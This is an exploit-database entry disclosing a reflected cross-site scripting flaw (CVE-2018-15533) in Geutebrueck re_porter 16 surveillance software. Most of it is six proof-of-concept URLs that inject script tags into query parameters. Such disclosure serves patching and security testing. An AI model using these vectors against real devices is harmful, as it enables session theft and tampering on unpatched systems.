[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Geutebrueck re_porter 16 - Cross-Site Scripting Vulnerability

Author
Kamil Suska
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-30943
Category
web applications
Date add
23-08-2018
CVE
CVE-2018-15533
Platform
hardware
# Exploit Title: Geutebrueck re_porter 16 - Cross-Site Scripting
# Exploit Author: Kamil Suska
# Vendor: https://www.geutebrueck.com/en_US.html
# Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html
# Version: prior 7.8.974.20
# CVE-2018-15533
 
# Attack Vectors
http://example.com:12005/modifychannel/exec?vv9r7<script>alert(1)</script>auubw=1
 
http://example.com:12005/images/IOMemoryPool.png?ebmf6<script>alert(1)</script>pmsih=1
 
http://example.com:12005/images/Statistics.png?q3dlx<script>alert(1)</script>zjvdw=1
 
http://example.com:12005/images/GLIBBackground.jpg?itfvf<script>alert(1)</script>irvnl=1
 
http://example.com:12005/images/MainMemoryPool.png?bzu69<script>alert(1)</script>m2hhj=1
 
http://example.com:12005/images/ProcessMemory.png?f4d7j<script>alert(1)</script>m5by3=

#  0day.today [2024-07-05]  #